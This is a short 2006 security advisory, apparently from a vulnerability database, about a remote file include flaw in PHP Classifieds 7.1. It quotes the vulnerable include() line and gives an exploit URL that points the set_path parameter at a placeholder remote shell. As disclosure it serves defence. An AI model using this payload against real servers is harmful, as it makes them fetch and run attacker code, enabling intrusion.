Lucene search
SecurityvulnsSECURITYVULNS:DOC:14763HistoryOct 21, 2006 - 12:00 a.m.
PHP Classifieds 7.1 - Remote File Include Vulnerability
2006-10-2100:00:00
vulners.com
20
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
PHP Classifieds 7.1 - Remote File Include Vulnerability
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Download : http://softadmin.deltascripts.com/download_get.php?id=32
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bug in : functions.php
Vuln Code :
include($set_path . '/admin/htmlMimeMail/htmlMimeMail.php');
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-
Exploit :
www.site.com/[path]/functions.php?set_path=|SH3LL|?
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-
Discovered by : Le CoPrA
Mail To : Le.CoPrA (at) hotmail (dot) com [email concealed]
Special Greetz FlYinG 2 || LovER BoY ||
Greetz4// alkasrgolden,3theaby geer Mohajer22, Qaher, Saudi HaCkRz, Black-Code, kOnDoR, AsbMay,HACKERS PAL, simo64, MR.wolF,Abdullah-00, cRiMiNaL NeT,020,Dark-Man, Dr.ExE ,egyptghost,KaBaRa,ToOoFA
Channel : wWw.TrYaG.cOm/vb WwW.D4Eg.orG WwW.kOnDoR4.Com/vb
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=